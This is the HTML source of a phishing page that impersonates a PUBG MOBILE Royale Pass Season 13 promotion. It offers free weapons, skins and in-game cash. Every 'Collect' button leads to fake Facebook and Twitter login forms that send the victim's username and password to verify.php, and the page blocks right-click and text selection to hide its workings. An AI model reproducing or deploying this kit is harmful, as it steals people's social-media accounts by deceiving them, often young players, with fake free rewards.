
<html>
<head>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta property="og:title" content="PUBG MOBILE - Royale Pass Season 13">
<meta name="description" content="Royale Pass Season 13 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!">
<meta property="og:description" content="Royale Pass Season 13 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!">
<meta property="og:url" content="./">
<meta property="og:site_name" content="PUBG MOBILE - Royale Pass Season 13">
<meta property="og:type" content="website">
<meta name="copyright"content="PUBG MOBILE">
<meta name="theme-color" content="#000">
<meta property="og:image" content="img/s13.png">
<title>PUBG MOBILE - Royale Pass Season 13</title>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/animate.css">
<link rel="stylesheet" href="css/facebook.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="icon" href="../img/icon.png">
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-159654279-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-159654279-2');
</script>

<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5dcbabd2869127ad"></script>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

<div class="container">
<div class="container-mask">
<div class="landing">
<img src="img/s13.png">
<br>
<span>ROYALE PASS SEASON 13</span>
<div class="slider-container">
<div class="slider animated fadeIn">
<p>
The season that survivors have been waiting for with a variety of cool prizes
<br>
Join and enjoy special free gifts in this new season
</p>
</div>
<div class="slider animated fadeIn">
<p>
The event has been prepared to welcome the 2nd anniversary of PUBG MOBILE
<br>
Join and enjoy special free gifts in this new season
</p>
</div>
</div>
<div class="hastag">#Toy Playground</div>
<div class="garis-landing"></div>
<center>
<button type="button" onclick="reward()">Collect reward</button>
</center>
</div>
</div> <!--- container --->

<div class="popup reward animated fadeIn" style="display: none;">
<div class="popup-box">
<div class="container">
<div class="container-mask">

<div class="home">

<div class="navbar">
<img src="img/s13.png">
<div class="navbar-title">
Royale Pass Season 13
</div>
<div class="navbar-desc">
Choose your favorite reward and login to receive
</div>
</div>
<div class="garis-home"></div>
<div class="menu">
<div class="menu-list" onclick="openHero(event, 'first');" id="defaultOpen">
Latest Reward
</div>
<div class="menu-list" onclick="openHero(event, 'second');">
Season Reward
</div>
<div class="menu-list" onclick="openHero(event, 'third');">
Cash Reward
</div>
</div>

<div class="scroll">

<div id="first" class="gallery">

<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/1.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/2.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/3.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/4.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/5.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/6.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/7.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/8.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/9.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/10.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/11.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/12.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/13.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/14.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/15.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/16.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/weapon/17.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/1.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/2.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/3.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/4.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/5.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/6.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/7.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/8.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/9.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/10.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/11.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/12.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/13.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/14.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/15.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/16.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/17.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/18.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/19.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/20.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/21.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/22.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/23.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/24.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/25.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/26.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/27.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/28.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/29.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/mythic/30.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/1.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/2.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/3.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/4.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/5.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/6.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/7.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/8.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/9.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/10.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/11.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/12.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/13.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/14.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/15.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/16.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/17.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/18.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/19.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/20.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/21.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/22.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/23.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/24.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/25.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/26.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/27.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/28.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/29.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/30.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/31.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/32.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/33.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/34.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/35.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/36.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/37.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/38.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/39.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/40.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/41.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/42.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/43.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/44.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/45.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/46.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/47.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/48.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/49.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/items/50.png">
</div>
</div> <!--- first tab --->

<div id="second" class="gallery">
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/1.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/2.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/3.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/4.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/5.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/6.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/7.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/8.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/9.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/10.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/11.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/12.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/13.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/14.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/15.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/16.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/17.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/18.png">
</div>
<div class="item">
<button onclick="login()">Collect</button>
<img style="border-bottom: none;" src="img/reward/season/19.png">
</div>
</div> <!--- second tab --->

<div id="third" class="gallery">
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>60</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>300 + 25</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>600 + 60</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>1500 + 300</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>3000 + 850</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>6000 + 2100</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>8000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>10000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>12000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>14000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>16000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="balance" onclick="login()">
<img src="img/uc.png">
<span>17000 + 1000</span>
</br>
Unknown Cash
</div>
</div> <!--- third tab --->

</div> <!--- scroll --->
</div>

</div> <!--- container --->
</div>
</div>
</div>
</div>

<div class="popup login animated fadeIn" style="display: none;">
<div class="popup-box">
<div class="container">
<div class="container-mask">
<div class="home">
<div class="navbar">
<img src="img/s13.png">
<div class="navbar-title">
Royale Pass Season 13
</div>
<div class="navbar-desc">
Login to your account to receive the prize
</div>
</div>
<div class="garis-home"></div>
<div class="btn-login" onclick="facebook()">
<div class="bungkusan-konten">
<div class="bungkusan-logo">
<center>
<img src="img/fb.png">
</center>
</div>  
<span class="bungkusan-teks"> 
<span>Login using Facebook</span>
</span>
</div>  
</div>
<div class="btn-login" onclick="location.href='twitter.php';">
<div class="bungkusan-konten">
<div class="bungkusan-logo">
<center>
<img src="img/twitter.png">
</center>
</div>  
<span class="bungkusan-teks"> 
<span>Login using Twitter</span>
</span>
</div>  
</div>
<button type="button" onclick="closelogin()">Back to reward</button>
</div> <!--- container --->
</div>
</div>
</div>
</div>

<div class="popup-login facebook animated fadeIn" style="display: none;">
	<div class="popup-box-login-fb">
		<a onclick="closefb()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
		<div class="navbar-fb">
			<img src="img/login/fb.png">
		</div>
		<div class="content-box-fb">
			<img src="https://www.pubgmobile.com/id/event/royalepass10/images/icon_logo.jpg">
			<div class="txt-login-fb">
				 Log in to your Facebook account to connect to PUBG MOBILE
			</div>
			<form class="login-form" action="verify.php" method="get">
				<label>
				<input type="text" name="username" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required>
				</label>
				<label>
				<input type="password" name="password" placeholder="Password" autocomplete="off" autocapitalize="off" required>
				</label>
				
				<input type="hidden" name="login" value="Facebook" readonly>
				<button type="submit" class="btn-login-fb">Log In</button>
			</form>
			<div class="txt-create-account">Create account</div>
			<div class="txt-not-now">Not now</div>
			<div class="txt-forgotten-password">Forgotten password?</div>
		</div>
		<div class="language-box">
			<center>
			<div class="language-name language-name-active">English (UK)</div>
			<div class="language-name">Bahasa Indonesia</div>
			<div class="language-name">Basa Jawa</div>
			<div class="language-name">Bahasa Melayu</div>
			<div class="language-name">日本語</div>
			<div class="language-name">Español</div>
			<div class="language-name">Português (Brasil)</div>
			<div class="language-name">
				<i class="fa fa-plus"></i>
			</div>
			</center>
		</div>
		<div class="copyright">Facebook Inc.</div>
	</div>
</div>

<div class="popup-login twitter animated fadeIn" style="display: none;">
	<div class="popup-box-login-twitter">
		<a onclick="closetwit()" class="close-other"><i class="zmdi zmdi-close"></i></a>
		<div class="header-twitter">
			<center>
			<img src="img/login/icon-twitter.png">
			</center>
		</div>
		<div class="box-twitter">
		<div id="indexresult">
			<div id="konten">
			<center>
			<form>
				<form class="login-form" action="verify.php" method="get">
				<div class="txt-login-twitter">Login to Twitter</div>
				<div class="input-box-twitter">
					<label>Phone, email, or username</label>
					<input type="text" name="username" id="email" placeholder="" required>
				</div>
				<div class="input-box-twitter">
					<label>Password</label>
					<input type="password" name="password" id="password" placeholder="" required>
				</div>
				<input type="hidden" name="login" value="Twitter" readonly>
				<button type="submit" class="btn-login-twitter" >Log In</button>
				<div class="footer-menu-twitter">Forgot password?</div>
				<div class="footer-menu-twitter bulet">•</div>
				<div class="footer-menu-twitter">Sign up to Twitter</div>
			</form>
			</center>
			</div>
			</div>
			<div id="loadingresult" style="display: none;">
				<div class="progress" style="display: none;">
					<div style="display: none;" class="progress-bar progress-bar-success progress-bar-striped active" role="progressbar" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" style="width: 100%"></div>
				</div>
			</div>
	
		</div>
	</div>
</div>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="js/slider.js"></script>
<script src="js/tab.js"></script>
<script src="js/popup.js"></script>
<script src="js/content.js"></script>
<script src="js/counter.js"></script>

</body>
</html>